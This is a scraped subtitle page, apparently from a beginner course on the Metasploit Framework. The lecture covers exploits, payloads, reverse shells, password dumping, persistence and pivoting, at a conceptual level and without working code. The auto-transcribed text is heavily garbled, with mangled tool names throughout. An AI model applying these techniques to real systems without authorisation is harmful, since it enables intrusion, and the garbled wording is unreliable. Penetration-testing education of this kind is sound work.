All language subtitles for 000 Metasploit Framework.en--- [ FreeCourseWeb.com ] ---
Afrikaans
Albanian
Amharic
Arabic
Armenian
Azerbaijani
Basque
Belarusian
Bengali
Bosnian
Bulgarian
Catalan
Cebuano
Chichewa
Chinese (Simplified)
Chinese (Traditional)
Corsican
Croatian
Czech
Danish
Dutch
English
Esperanto
Estonian
Filipino
Finnish
French
Frisian
Galician
Georgian
German
Greek
Gujarati
Haitian Creole
Hausa
Hawaiian
Hebrew
Hindi
Hmong
Hungarian
Icelandic
Igbo
Indonesian
Irish
Italian
Japanese
Javanese
Kannada
Kazakh
Khmer
Korean
Kurdish (Kurmanji)
Kyrgyz
Lao
Latin
Latvian
Lithuanian
Luxembourgish
Macedonian
Malagasy
Malay
Malayalam
Maltese
Maori
Marathi
Mongolian
Myanmar (Burmese)
Nepali
Norwegian
Pashto
Persian
Polish
Portuguese
Punjabi
Romanian
Russian
Samoan
Scots Gaelic
Serbian
Sesotho
Shona
Sindhi
Sinhala
Slovak
Slovenian
Somali
Spanish
Sundanese
Swahili
Swedish
Tajik
Tamil
Telugu
Thai
Turkish
Ukrainian
Urdu
Uzbek
Vietnamese
Welsh
Xhosa
Yiddish
Yoruba
Zulu
Odia (Oriya)
Kinyarwanda
Turkmen
Tatar
Uyghur
Would you like to inspect the original subtitles? These are the user uploaded subtitles that are being translated:
1
00:00:11,940 --> 00:00:14,340
I don't go back to another episode on How to Hack.
2
00:00:14,720 --> 00:00:20,240
So today we'll be discussing about misapply framework for Beginners and we'll be looking at the architecture
3
00:00:20,390 --> 00:00:22,310
or the framework of Manasquan framework.
4
00:00:22,550 --> 00:00:27,080
And look at the modules are available instead of splotchy, as well as exploit and exploitation that
5
00:00:27,080 --> 00:00:28,270
we'll use alongside Cymatics.
6
00:00:28,850 --> 00:00:33,230
And this can really accelerate the pace of how quickly we're performing our penetration testing.
7
00:00:33,230 --> 00:00:38,300
And this can be really useful and helpful, especially when we are trying to understand more about how
8
00:00:38,300 --> 00:00:44,390
we could utilize misapply to help us get access into systems, find vulnerabilities, look at exploits
9
00:00:44,390 --> 00:00:45,140
as well as Palouse.
10
00:00:45,140 --> 00:00:48,470
They're available as well on top of that to post exploitation.
11
00:00:48,470 --> 00:00:50,240
What do we do after we get into the system?
12
00:00:50,240 --> 00:00:51,590
Are we able dumble passwords?
13
00:00:51,890 --> 00:00:54,020
I'll be able to get privilege escalation.
14
00:00:54,030 --> 00:00:56,930
So again, all these are key questions that you probably have.
15
00:00:56,930 --> 00:00:58,730
You have been using metastable for a while now.
16
00:01:01,500 --> 00:01:06,210
So what exactly is a better supply framework, so that supply framework is a penetration testing platform
17
00:01:06,240 --> 00:01:11,430
that allow us to use different modules and the modules on the right, you can see a module is a standalone
18
00:01:11,430 --> 00:01:16,980
piece of code that is in some or in a lot of ways not interacted with the other modules inside that
19
00:01:17,010 --> 00:01:17,670
supply framework.
20
00:01:17,850 --> 00:01:19,320
So you could do this on yourself.
21
00:01:19,320 --> 00:01:24,530
If you look at some of the template guy about coding your own exploited coding or in modules inside
22
00:01:24,540 --> 00:01:25,360
that supply framework.
23
00:01:25,380 --> 00:01:29,910
So that's a great way to start off with a special later on when you're trying to program some of these
24
00:01:29,910 --> 00:01:30,450
features.
25
00:01:30,600 --> 00:01:34,380
And we'll definitely be uploading a video about how you could create your own modules.
26
00:01:34,530 --> 00:01:39,570
Look at some of the exploits that you could potentially look at and be able to use and upload or change
27
00:01:39,570 --> 00:01:41,550
some of the code because everything is open source.
28
00:01:41,970 --> 00:01:44,300
So play framework has two versions.
29
00:01:44,310 --> 00:01:46,290
One is the pro version.
30
00:01:46,290 --> 00:01:47,370
So you have to pay for that.
31
00:01:47,520 --> 00:01:51,060
And one that we've been looking at in a lot of tutorials have always been a free one.
32
00:01:51,390 --> 00:01:53,940
And of course, there are some limitations in terms of free one.
33
00:01:53,970 --> 00:01:58,980
So, again, if you are a full time penetration tester or you're doing a lot of security assessments,
34
00:01:58,980 --> 00:02:01,290
so highly recommended to go for a paid version.
35
00:02:01,830 --> 00:02:05,170
And of course, if you look at a bottom, we have services of medicine.
36
00:02:05,410 --> 00:02:09,660
So, again, if you look at some of the tutorials online, we could see that sometimes people would
37
00:02:09,660 --> 00:02:14,370
have to study a possible sequel in order to start running the database of services inside supply.
38
00:02:14,430 --> 00:02:19,530
So, again, this could be because of supply use, possible sequel to actually stall all this data.
39
00:02:19,590 --> 00:02:24,030
So, again, you have to start to services before you're able to kick some ass boyfriend work.
40
00:02:26,850 --> 00:02:32,460
So today, we'll cover three key points in the agenda, so first of all, is about misplay framework,
41
00:02:32,460 --> 00:02:33,090
how does it work?
42
00:02:33,360 --> 00:02:37,380
And abattoirs in terms of the margins there available for you using that display framework?
43
00:02:37,390 --> 00:02:42,810
And lastly, how can we scope and define the kind of parameters and options that we want to push into
44
00:02:42,810 --> 00:02:43,320
the system?
45
00:02:45,240 --> 00:02:49,110
So first of all, let's understand three key points as part of our supply framework.
46
00:02:49,230 --> 00:02:51,360
So the very first is vulnerability.
47
00:02:51,600 --> 00:02:56,710
We have to make sure that we want to find our vulnerability inside the system, inside the machine.
48
00:02:56,780 --> 00:02:59,710
We're trying to hack into by using exploits and so on.
49
00:02:59,730 --> 00:03:04,770
So this is the part where we have to scanning modules available in some way framework that we can utilize
50
00:03:04,950 --> 00:03:05,460
or to.
51
00:03:05,460 --> 00:03:10,770
We could also use other tools like and MAP to find out the service version of the software version that
52
00:03:10,770 --> 00:03:14,460
has those services running out to find out what kind of services are running into the system.
53
00:03:14,700 --> 00:03:20,010
So, again, if a system is fully patch, have no vulnerability and then we have to start thinking about
54
00:03:20,010 --> 00:03:23,610
zero day potential as we want to craft out our exploit inside the system.
55
00:03:23,730 --> 00:03:27,980
So, again, that could be very tedious and cumbersome and could take a really long time to develop.
56
00:03:28,710 --> 00:03:33,540
And of course, the vulnerabilities are basically areas of opportunities that we can actually hack into
57
00:03:33,540 --> 00:03:33,980
the system.
58
00:03:33,990 --> 00:03:37,860
So vulnerability will be one of the key terms that we must understand.
59
00:03:38,280 --> 00:03:39,990
And number two is in terms of exploit.
60
00:03:39,990 --> 00:03:46,020
So exploit is what happens when we are able to bypass the security mechanism inside a particular service
61
00:03:46,140 --> 00:03:47,860
or a software operating system.
62
00:03:48,090 --> 00:03:53,670
So, again, this allow us to be able to take control of the system to control the software or the services
63
00:03:53,670 --> 00:03:57,030
running inside an operating system and arbitrages payload.
64
00:03:57,030 --> 00:04:00,600
So payload is what do we do after we get into the system?
65
00:04:01,020 --> 00:04:01,850
Do we want to show?
66
00:04:02,070 --> 00:04:03,650
Do we want it to trigger a shutdown?
67
00:04:03,780 --> 00:04:09,780
So again, payload come alongside with matter supply mainly as shells to give us control of the system
68
00:04:09,780 --> 00:04:15,980
so that we can do a lot more different kind of commands, manipulation of the system as part of a supply
69
00:04:15,990 --> 00:04:16,560
framework.
70
00:04:19,250 --> 00:04:23,960
So what's the advantages of using misapply framework compared to, say, using manual way of trying
71
00:04:23,960 --> 00:04:25,090
to do penetration testing?
72
00:04:25,520 --> 00:04:28,670
So there are five key ways for us to think about in terms of the advantages.
73
00:04:28,850 --> 00:04:35,480
So one is more supply is use a lot in a lot of penetration testing tools, a lot of auditing platforms.
74
00:04:35,720 --> 00:04:41,420
And it is used extensively to test companies for your security posture very, very frequently.
75
00:04:41,420 --> 00:04:46,370
And as such, having skill set amount of supply will be very helpful for you, because whenever you're
76
00:04:46,370 --> 00:04:50,510
joining a new team of penetration testers, chances are they have Mattiske boyfriend running.
77
00:04:50,720 --> 00:04:54,080
And it will be great if you are familiar with it, because some of the interview questions could also
78
00:04:54,080 --> 00:04:55,100
come alongside with that.
79
00:04:55,820 --> 00:04:59,660
And of course, the great thing is that it simplifies complicated or complex task.
80
00:04:59,870 --> 00:05:05,330
So complex tasks, meaning that you have sequential of actions that need to be carried out as part of
81
00:05:05,330 --> 00:05:06,380
your penetration testing.
82
00:05:06,380 --> 00:05:11,600
As such, you could use manage supply scripts to also automate it for you as much as possible so you
83
00:05:11,600 --> 00:05:14,210
can simplify many of this complex task together.
84
00:05:14,420 --> 00:05:19,280
And you can also put session on a background and use your own scripts to run through and execute inside
85
00:05:19,280 --> 00:05:19,940
a current session.
86
00:05:19,980 --> 00:05:24,980
So, again, a lot of this complexity can be taken out and simplified to the user matter.
87
00:05:24,980 --> 00:05:25,370
Splotchy.
88
00:05:26,260 --> 00:05:32,080
No tree is in terms of the range of capabilities that he can use along with matter supply, because
89
00:05:32,080 --> 00:05:34,840
it is built in a old and systematic way.
90
00:05:35,020 --> 00:05:40,720
So you can think of the mortgages that are available and you have auxillary scanners and you have exploits
91
00:05:40,720 --> 00:05:42,370
and you have post exploitation.
92
00:05:42,490 --> 00:05:48,190
So all these are really segmented into many different modules, many different in terms of a cyber attack
93
00:05:48,190 --> 00:05:48,560
chain.
94
00:05:48,700 --> 00:05:51,010
How are you trying to work around a system?
95
00:05:51,010 --> 00:05:53,460
So again, all this already of all that for you.
96
00:05:53,470 --> 00:05:59,830
So it's easy for you to visualize how where you are in the attack phase, where which part of the penetration
97
00:05:59,830 --> 00:06:03,280
testing you're at and what is the next step for you in order to carry them out.
98
00:06:04,000 --> 00:06:05,770
So this is all consistent updates.
99
00:06:05,770 --> 00:06:09,330
You get a lot of updates as you run about a supply framework into your system.
100
00:06:09,340 --> 00:06:14,590
So all this updates can help troubleshoot system, make sure the system are running fine and making
101
00:06:14,590 --> 00:06:16,390
sure your exploits are working as intended.
102
00:06:16,540 --> 00:06:21,070
So, again, all these updates are great for you, especially in terms of trying to make sure that you
103
00:06:21,070 --> 00:06:23,620
can perform your penetration testing smoothly.
104
00:06:24,700 --> 00:06:28,960
And of course, the great point is there are thousands of bodies inside that a supply framework.
105
00:06:29,140 --> 00:06:33,160
And this is really helpful because all these functions have been built by many of these penetration
106
00:06:33,160 --> 00:06:33,700
testers.
107
00:06:33,790 --> 00:06:39,310
And you can use them and be able to accelerate how quickly you are performing a penetration testing
108
00:06:39,340 --> 00:06:45,490
and all these tools at and help you find out potential vulnerabilities, exploits, as well as Paillot
109
00:06:45,490 --> 00:06:51,190
so that you are able to speed up the pace of how quickly you could get into the system and generate
110
00:06:51,190 --> 00:06:56,950
those reports necessary in order to find out more things about the entity to target entity of the target
111
00:06:56,950 --> 00:06:57,550
enterprise.
112
00:07:00,100 --> 00:07:05,380
So here we got a screenshot of my display, so whenever you in colonics or if you have install it on
113
00:07:05,380 --> 00:07:08,940
your Windows operating system, all you do is enter MSF console.
114
00:07:09,200 --> 00:07:10,790
You'll be brought into this page.
115
00:07:10,810 --> 00:07:16,270
So here we can see you've got two dozen four exploits, one zero nine auxillary, three four two post
116
00:07:16,480 --> 00:07:21,550
five six four payloads, forty five Encoders, 10 and Ops and seven invasion.
117
00:07:21,560 --> 00:07:24,190
So again, a lot of modules available as part of it.
118
00:07:24,370 --> 00:07:28,840
That could be austinmer of attack as it comes to doing and performing penetration testing.
119
00:07:31,230 --> 00:07:35,640
So one of the key things I really want to share with you as the number one advice when it comes to using
120
00:07:35,640 --> 00:07:39,410
metaphore framework is to go into the help wherever you are.
121
00:07:39,780 --> 00:07:41,190
So it is an interactive shell.
122
00:07:41,190 --> 00:07:45,690
So every time you're moving from one shell to another shell or you're moving from one place to another
123
00:07:45,960 --> 00:07:51,000
inside a supply framework, go ahead and to help freely enter help whenever you have the chance to.
124
00:07:51,120 --> 00:07:56,160
And you can see all the commands available to you that you can kihn that you can enter into.
125
00:07:56,220 --> 00:08:01,230
And this is really helpful for you to get yourself familiar with the user matter supply framework.
126
00:08:01,500 --> 00:08:06,660
So over here, in this case, we enter help and we can see all the functions and features and commands
127
00:08:06,660 --> 00:08:08,230
that we can use alongside with it.
128
00:08:08,370 --> 00:08:13,110
So this is really helpful in terms of trying to get yourself familiar with the supply framework.
129
00:08:14,900 --> 00:08:20,060
So, of course, now we move on into the exploits or exploits of ranked exploits are rank in terms of
130
00:08:20,060 --> 00:08:22,910
how good they are, do actually go off the system.
131
00:08:22,920 --> 00:08:27,440
So we got a ranking of excellent, great, good, normal, average, low and manual.
132
00:08:27,890 --> 00:08:32,480
So, of course, the best option to choose from will be excellent ranking because that entry to the
133
00:08:32,480 --> 00:08:37,730
system don't crash, because if the system crashes, then that could actually alert system administrators.
134
00:08:37,890 --> 00:08:42,280
And if you're doing a penetration testing on production systems, this is highly dangerous.
135
00:08:42,440 --> 00:08:48,230
In fact, most of the time you should always go after penetration testing on the environment or where
136
00:08:48,230 --> 00:08:54,770
the systems are actually merit to a separate lab test or a virtual set up where you could actually mimic
137
00:08:54,950 --> 00:08:58,090
real life production environment and be able to do all this testing on.
138
00:08:58,100 --> 00:09:02,200
So they'll be the number one advice for whenever we're doing penetration testing.
139
00:09:02,600 --> 00:09:04,550
So of course, we got the different kind of rankings.
140
00:09:04,550 --> 00:09:10,100
So we have to choose wisely what we want to use when it comes to executing many of these payloads.
141
00:09:12,150 --> 00:09:17,340
So over here, when you do a search on exploit or you want to show exploits, it will show you the thousands
142
00:09:17,340 --> 00:09:18,560
of exploits available.
143
00:09:18,570 --> 00:09:21,490
And of course, the first one we can look at is the ID number.
144
00:09:21,510 --> 00:09:27,120
So that number of stars from one foreign country, I can from one all the way to two one and we can
145
00:09:27,120 --> 00:09:30,060
see the windows, we understand, for the Windows operating system.
146
00:09:30,070 --> 00:09:34,620
So again, it could be Eunuch's, it could be any other type of Android devices as well.
147
00:09:34,630 --> 00:09:39,460
So depending on the operating system, followed by the service on top of the operating system and from
148
00:09:39,460 --> 00:09:42,740
the service, followed by a service type of service version.
149
00:09:42,750 --> 00:09:44,360
So that could be very software driven.
150
00:09:44,640 --> 00:09:50,160
So I'll say, for example, you're using a Windows so you could be a directory, could be an easy FTP.
151
00:09:50,520 --> 00:09:55,890
And of course, followed by the date, the date when the KVI common vulnerability exposure was released,
152
00:09:56,130 --> 00:09:58,270
followed by the ranking of the exploit.
153
00:09:58,560 --> 00:09:58,880
Yes.
154
00:09:58,890 --> 00:09:59,180
No.
155
00:09:59,190 --> 00:10:05,160
And a final one is actually on the version number of the particular exploit.
156
00:10:08,650 --> 00:10:13,720
So over here, of course, so we can show options whenever we are inside a supply framework.
157
00:10:13,750 --> 00:10:19,060
So once you have selected the use of that particular exploit payload or any of those modules, you can
158
00:10:19,060 --> 00:10:19,750
enter show option.
159
00:10:19,770 --> 00:10:25,330
So show options will show you the perimeters that are needed in order to execute this particular module.
160
00:10:25,630 --> 00:10:30,070
So in this case, we're using Windows Sambi MS 17 zero one zero.
161
00:10:31,480 --> 00:10:36,610
So in this case, we got our host, we got DG Treys, we got like a Tab's down pipe and so on.
162
00:10:36,640 --> 00:10:41,840
So, again, all this some of them, if you see under Thirt column, is required.
163
00:10:42,100 --> 00:10:49,300
So requirements it's compulsory is a value that you must specify in order to use that particular module.
164
00:10:49,450 --> 00:10:54,160
And of course, on the right side, we have the description about the module and here all the description
165
00:10:54,160 --> 00:10:55,790
about a parameter and an option that you have.
166
00:10:55,930 --> 00:10:57,130
So, again, very important.
167
00:10:57,130 --> 00:11:02,690
If you need any help, go ahead and to help really to understand more about the module and all the commands
168
00:11:02,690 --> 00:11:05,200
is available for you to use as part of the module.
169
00:11:07,680 --> 00:11:11,880
Of course, this would go us into the Paillot, so what happened after you exploited in the system?
170
00:11:12,240 --> 00:11:14,490
You want to execute something you want to execute?
171
00:11:14,490 --> 00:11:17,550
Most of the time, a payload and a payload is usually a shell.
172
00:11:17,790 --> 00:11:19,980
So, again, there are a number of shells that we can choose from.
173
00:11:20,160 --> 00:11:25,580
So you see on the background, we have windows, which is the operating system, type 64 architecture,
174
00:11:25,590 --> 00:11:26,610
the platform architecture.
175
00:11:26,880 --> 00:11:30,270
And then of course, we got Shell and we got different social media protocols.
176
00:11:30,270 --> 00:11:34,680
The most popular one of all, because it gives us a lot of capabilities in terms of penetration testing,
177
00:11:34,950 --> 00:11:38,160
while we can also do and get a normal shell of windows.
178
00:11:38,380 --> 00:11:43,440
Again, this is depending on the kind of privileges you're going to get or you think that you're going
179
00:11:43,440 --> 00:11:45,600
to get as part of your penetration testing.
180
00:11:45,810 --> 00:11:48,900
But the most preferred, of course, is made a printer, but, of course, made a printer.
181
00:11:48,900 --> 00:11:54,780
Also has some of these potential items that could be detected by antivirus system or endpoint detection
182
00:11:54,780 --> 00:11:55,740
and response systems.
183
00:11:56,040 --> 00:12:01,200
So, again, all this choosing of a selection of the payload is very important as part of penetration
184
00:12:01,200 --> 00:12:07,530
testing, especially if you're trying to penetrate into systems that are highly updated.
185
00:12:07,560 --> 00:12:11,430
So, again, all these are things that you want to keep in mind when you're selecting the kind of payloads
186
00:12:11,430 --> 00:12:12,300
to go in into.
187
00:12:14,110 --> 00:12:14,740
So here we go.
188
00:12:15,250 --> 00:12:20,710
Also, middle school is a great way in terms of exploiting a system, getting to payload, which has
189
00:12:20,710 --> 00:12:24,410
a lot of functions and features in terms of post exploitation as well as exploitation.
190
00:12:24,850 --> 00:12:31,540
So in terms of privilege, escalation, uploading, downloading a files, etc., so great way, especially
191
00:12:31,540 --> 00:12:36,850
in terms of running many different kind of modules, especially when it comes to penetration testing.
192
00:12:37,150 --> 00:12:40,980
So it's one of the most preferred shell, if you could get it, without detection.
193
00:12:41,320 --> 00:12:46,130
So again, this will be a great way for you to actually try out many of these different commands.
194
00:12:46,270 --> 00:12:51,100
So, again, as device enter help the moment you're in session, and this could actually show all the
195
00:12:51,100 --> 00:12:52,720
features and commands that you want to see.
196
00:12:52,960 --> 00:12:57,250
And from there on, you'll be able to find out things that you can do Furter and things that you could
197
00:12:57,250 --> 00:12:58,090
be limited to.
198
00:12:58,270 --> 00:13:01,870
And you have to a background session and be able to run all those sexploitation.
199
00:13:03,800 --> 00:13:05,880
So, of course, this will bring us to post exploitation.
200
00:13:05,900 --> 00:13:08,940
So the question is always now, then, of exploiting the system.
201
00:13:09,380 --> 00:13:09,930
What's next?
202
00:13:10,040 --> 00:13:10,930
What do I do next?
203
00:13:11,030 --> 00:13:12,160
How do I get passwords?
204
00:13:12,260 --> 00:13:13,490
How do I get persistance?
205
00:13:13,820 --> 00:13:19,010
So, again, there are a lot of post exploitation modules available in site Matus boyfriend that can
206
00:13:19,130 --> 00:13:20,360
help you in that way.
207
00:13:20,570 --> 00:13:24,100
So, of course, is a heart attack into Target organization.
208
00:13:24,560 --> 00:13:27,170
You want to pivot from one machine to another machine.
209
00:13:27,260 --> 00:13:29,480
You want to do scanning on the environment.
210
00:13:29,690 --> 00:13:33,290
You want to find out what protocols you're using, what servers they have, what services they have
211
00:13:33,290 --> 00:13:34,280
on top of those servers.
212
00:13:34,860 --> 00:13:40,850
So, again, all these are capable in helping you actually expand the scope of your exploitation.
213
00:13:43,610 --> 00:13:45,240
So here we got post Windows Exploit.
214
00:13:45,320 --> 00:13:50,780
So, of course, you can actually do a search on post and we can actually see all the modules available
215
00:13:50,780 --> 00:13:52,150
as part of post exploitation.
216
00:13:52,180 --> 00:13:56,690
We got privilege escalation and we got dumping out of data dumping and passwords.
217
00:13:56,710 --> 00:13:59,600
So, again, all these are there for us to take a look at.
218
00:13:59,610 --> 00:14:03,950
So especially when we go into tutorial later, we can actually see many of these modules and see how
219
00:14:03,950 --> 00:14:07,540
they function and work and what kind of data we can actually pull out from the system.
220
00:14:08,000 --> 00:14:12,980
So directly from the screenshot we could see, we could look at post Windows, Manesh webcam, we can
221
00:14:12,980 --> 00:14:16,240
look at resolving IP addresses, we can look at wireless list.
222
00:14:16,250 --> 00:14:21,050
So again, all this are some of the polls exploitation now we could be using in order to find out more
223
00:14:21,050 --> 00:14:26,750
information about a system trying to get privilege escalation again, many different items and features
224
00:14:26,750 --> 00:14:27,740
that we can look into.
225
00:14:30,030 --> 00:14:34,950
So there are also a lot of auxillary modules available as part of their supply framework, so in this
226
00:14:34,950 --> 00:14:39,360
case, on the right side, we have Etman, we got crawlers, we got scanners and we got Fyssas.
227
00:14:39,570 --> 00:14:44,970
So when you go into Mazwai framework, you can search for Auxillary and you can see all this modules
228
00:14:44,970 --> 00:14:47,310
available or all these subcategories available.
229
00:14:47,310 --> 00:14:51,900
So there are a lot more subcategories that you can look at that may be outside of scope of today's lecture.
230
00:14:51,930 --> 00:14:53,880
So, again, do explore them whenever you have to.
231
00:14:53,880 --> 00:14:54,420
Time to.
232
00:14:56,160 --> 00:15:01,080
So, of course, the first one is the crawler, so Criollo actually allow us to crawl into the system,
233
00:15:01,080 --> 00:15:07,710
so allow us to crawl through Web application servers, allow us to find our subdirectory, do a crawling
234
00:15:07,710 --> 00:15:12,780
into the system, like how we deploy web crawlers from search engines and we'll go into the site deeply
235
00:15:13,050 --> 00:15:18,000
finding out things that may be accidentally being exposed to publicly available information.
236
00:15:18,360 --> 00:15:23,490
So, again, we can use MSF Criollo on that and that can help us crawl into the Web server and finding
237
00:15:23,490 --> 00:15:24,690
out all this information.
238
00:15:26,650 --> 00:15:31,390
And of course, we also got a scanner, so scanners help us scan that particular service, whether it's
239
00:15:31,390 --> 00:15:34,820
available that is vulnerable to different kind of exploits.
240
00:15:35,050 --> 00:15:40,120
So we have done a number of tutorials about using auxillary scanner where we scan the Windows 10 operating
241
00:15:40,120 --> 00:15:43,210
system to see if it was vulnerable to eternal blue.
242
00:15:43,360 --> 00:15:47,560
So, again, that could be the first step you take before you run the exploit, because if the system
243
00:15:47,710 --> 00:15:50,440
is not vulnerable, then you will not be able to exploit it.
244
00:15:50,530 --> 00:15:55,540
And then you have to start scanning for other items inside a target machine before you're able to run,
245
00:15:55,540 --> 00:15:56,170
you exploit.
246
00:15:58,950 --> 00:16:04,650
So, of course, we have to go forcing so we uploaded a new video on SQL injection that was a full tutorial
247
00:16:04,650 --> 00:16:04,970
on that.
248
00:16:04,980 --> 00:16:06,130
So that was really interesting.
249
00:16:06,570 --> 00:16:11,100
So it's fairly similar in the sense that we are trying to foster service of the system.
250
00:16:11,100 --> 00:16:17,520
We're trying to inject code into the system to break it, to get past the buffer and be able to inject
251
00:16:17,520 --> 00:16:18,590
things into the system.
252
00:16:18,600 --> 00:16:20,340
So we're trying to find software Bachs.
253
00:16:20,640 --> 00:16:26,460
So in this case, as part of the auxillary modules of fazing inside Manzoni framework, we got support
254
00:16:26,460 --> 00:16:27,510
for a different protocol.
255
00:16:27,520 --> 00:16:30,280
So we got DNS, FTP and so on.
256
00:16:30,510 --> 00:16:37,170
So again, all these are ways and areas where we can try to push and inject code into those services
257
00:16:37,260 --> 00:16:40,850
to see when we can actually find vulnerabilities inside a system.
258
00:16:40,860 --> 00:16:46,410
So a lot more manual effort in terms of checking those systems or services for vulnerabilities.
259
00:16:48,520 --> 00:16:53,470
So, of course, before we go into dictatorial, the most important question right now you have in your
260
00:16:53,470 --> 00:16:56,940
mind is how can we write our own exploding supply framework?
261
00:16:56,950 --> 00:16:59,950
So again, we are going to cover it is in subsequent tutorial.
262
00:16:59,970 --> 00:17:01,030
So stay tuned for that.
263
00:17:01,420 --> 00:17:05,780
So for now, let us go into the tutorial of going through into metastable framework.
264
00:17:06,190 --> 00:17:11,410
So on the left side of screen of colonics running and all you got to do is actually click on the terminal
265
00:17:11,410 --> 00:17:13,960
emulator and we can actually zoom in a little.
266
00:17:13,960 --> 00:17:15,100
So it's easier for you to see.
267
00:17:15,490 --> 00:17:18,020
So I can actually go in and or MSF console.
268
00:17:18,310 --> 00:17:22,630
So this will start up the amount of supply framework immediately, just like what we see on the electric
269
00:17:22,630 --> 00:17:22,980
slide.
270
00:17:23,890 --> 00:17:25,000
So I'm here on a lecture slide.
271
00:17:25,000 --> 00:17:27,450
We can see that we actually keun into MSF console.
272
00:17:27,730 --> 00:17:30,960
So over here we are starting the med supply framework console.
273
00:17:31,300 --> 00:17:35,850
So once we're in, we'll be able to see, number one, the number of exploits, auxillary modules,
274
00:17:36,130 --> 00:17:39,550
pulse exploitation payloads, encoders and no ops as well.
275
00:17:39,550 --> 00:17:40,400
Seven, evasion.
276
00:17:41,050 --> 00:17:43,880
So now once we're in, all you got to do is enter help.
277
00:17:43,990 --> 00:17:47,260
So when you enter help, it will show you all the commands available.
278
00:17:47,270 --> 00:17:53,680
So again, wherever you are in the interactive shell, it's great if you have the ability to go into
279
00:17:53,680 --> 00:17:59,260
the help page or help command and it will show you all the parameters and all the commands that you
280
00:17:59,260 --> 00:18:01,070
can actually key in into the system.
281
00:18:01,270 --> 00:18:05,860
So this is a great way to actually explore and begin exploring new supply frameworks.
282
00:18:05,860 --> 00:18:08,680
So a very important way to understand more about exploiting.
283
00:18:09,820 --> 00:18:14,350
So, of course, as demonstrated on the lecture slide, we'll be looking also, of course, at some
284
00:18:14,350 --> 00:18:20,590
other key areas in terms of exploit so you can actually enter Shole followed by exploits and you hit
285
00:18:20,590 --> 00:18:21,220
enter and debt.
286
00:18:21,430 --> 00:18:26,950
So if you enter shool and if you do a double tap on a keyboard, it will show all the options that you
287
00:18:26,950 --> 00:18:28,000
have a spot of Schull.
288
00:18:28,270 --> 00:18:32,760
So here when you see Schull, there's a show all show auxillary and codas and so on.
289
00:18:33,070 --> 00:18:36,240
So of course we can enter a show, for example, on exploits.
290
00:18:36,550 --> 00:18:40,390
So this would actually show and pull out all the exploits from the database.
291
00:18:40,540 --> 00:18:44,240
And we want to show you what exploits are available as part of a supply framework.
292
00:18:44,620 --> 00:18:48,760
So when I hit enter and is this could take some time to load because it's trying to pull all this data
293
00:18:48,760 --> 00:18:49,750
out from the database.
294
00:18:49,900 --> 00:18:52,420
So you may take a little while for the query to complete.
295
00:18:53,110 --> 00:18:59,170
So of course, likewise you could see show all you could enter, show auxillary and exploits no ops,
296
00:18:59,410 --> 00:19:01,300
show options, payloads and so on.
297
00:19:01,330 --> 00:19:06,460
So again, a very important way for us to understand about how we could actually see all the modules
298
00:19:06,460 --> 00:19:07,210
inside the system.
299
00:19:07,210 --> 00:19:11,770
So show is one of those commands that you will use extensively to actually find out modules that you
300
00:19:11,770 --> 00:19:12,600
can look out for.
301
00:19:13,270 --> 00:19:16,250
And another option that we have is also in terms of searching.
302
00:19:16,630 --> 00:19:21,070
So in terms of searching, we can also search specifically, we can search for any keywords, just like
303
00:19:21,070 --> 00:19:26,080
how you use any of the search engine so you can to search, followed by the type of payload that you
304
00:19:26,080 --> 00:19:26,860
could be looking for.
305
00:19:27,190 --> 00:19:33,250
You could be looking for anything, perhaps, for example, related to Android or anything example related
306
00:19:33,250 --> 00:19:33,880
to Apache.
307
00:19:34,060 --> 00:19:39,390
So, again, all these are things that you can actually look for as you are using Matus framework.
308
00:19:39,640 --> 00:19:41,710
So, of course, in this case, we're still waiting for this show.
309
00:19:42,080 --> 00:19:43,600
So now we have to return.
310
00:19:43,630 --> 00:19:48,760
So if you remember earlier from the lecture right over here on the right site, we have different kind
311
00:19:48,760 --> 00:19:49,820
of ratings.
312
00:19:49,820 --> 00:19:50,350
So ranking.
313
00:19:50,350 --> 00:19:55,930
So we got the rankings of excellent, great, good, normal, average, low end manuell.
314
00:19:56,260 --> 00:20:01,330
So in this case, when you enter on the show exploits, we can see normal average manuell.
315
00:20:01,330 --> 00:20:01,780
Great.
316
00:20:02,050 --> 00:20:04,540
And maybe you're looking for Excelon over here like Weisse.
317
00:20:04,540 --> 00:20:05,550
We can see it over here.
318
00:20:05,950 --> 00:20:10,090
So again, we are able to see all the modules information as part of it.
319
00:20:10,840 --> 00:20:12,940
So, of course, moving back, we can enter.
320
00:20:12,940 --> 00:20:13,420
Such as?
321
00:20:13,420 --> 00:20:13,810
Well.
322
00:20:13,810 --> 00:20:17,320
And perhaps you want to search for Android so you can search on that.
323
00:20:17,320 --> 00:20:20,220
And it was show you all the different modules available.
324
00:20:20,230 --> 00:20:25,500
So if you scroll all the way up is actually over here, we can see Auxillary as the type of modules
325
00:20:25,510 --> 00:20:26,350
we're looking for.
326
00:20:26,380 --> 00:20:29,290
And now we have the administrator, Android, Google Play store.
327
00:20:29,650 --> 00:20:32,920
And of course, we got a ranking disclosure data as a CSV exploit.
328
00:20:33,370 --> 00:20:36,540
And of course, on the right side, we have a description of the particular module.
329
00:20:37,150 --> 00:20:41,080
So as you scroll down, we can see the different kind of auxillary modules are available for you to
330
00:20:41,080 --> 00:20:41,480
use.
331
00:20:41,710 --> 00:20:46,090
So we have Gater, we have Geter, we got a scanner again, we got a server.
332
00:20:46,630 --> 00:20:50,950
And of course, as you scroll down, we have exploit exploit, followed by the operating system type.
333
00:20:51,370 --> 00:20:56,410
And then the major category followed by the subcategory are the name of the particular service that
334
00:20:56,410 --> 00:20:57,470
we're exploiting into.
335
00:20:57,730 --> 00:20:59,740
So here we got the Android debark breech.
336
00:20:59,740 --> 00:21:06,040
So we actually show Android Buckeridge the past few videos about how we could actually be able to exploit
337
00:21:06,040 --> 00:21:06,190
them.
338
00:21:06,220 --> 00:21:08,020
So, again, really, really useful on that.
339
00:21:08,380 --> 00:21:14,410
So because Stagefright MP four, so this is a way for actually the user to execute AMP for video file
340
00:21:14,620 --> 00:21:16,340
and you gain complete control of the system.
341
00:21:16,660 --> 00:21:20,560
So again, many exploits for us to actually try and test out on.
342
00:21:20,770 --> 00:21:24,250
It's a great way for us to understand more about a system operating system question.
343
00:21:24,640 --> 00:21:26,260
And of course, we've got a different kind of payloads.
344
00:21:26,950 --> 00:21:28,840
So payloads are basically giving us shell.
345
00:21:29,080 --> 00:21:31,030
So we got a normal android shell.
346
00:21:31,030 --> 00:21:34,030
And of course, we also got meta preta shell over here that you can see.
347
00:21:34,030 --> 00:21:37,640
So reverse TCP reverse ETPs.
348
00:21:37,930 --> 00:21:41,050
And of course we've got post exploitation as part of the operating system.
349
00:21:41,050 --> 00:21:44,710
So we've got post Android Geter trying to dump all hash values.
350
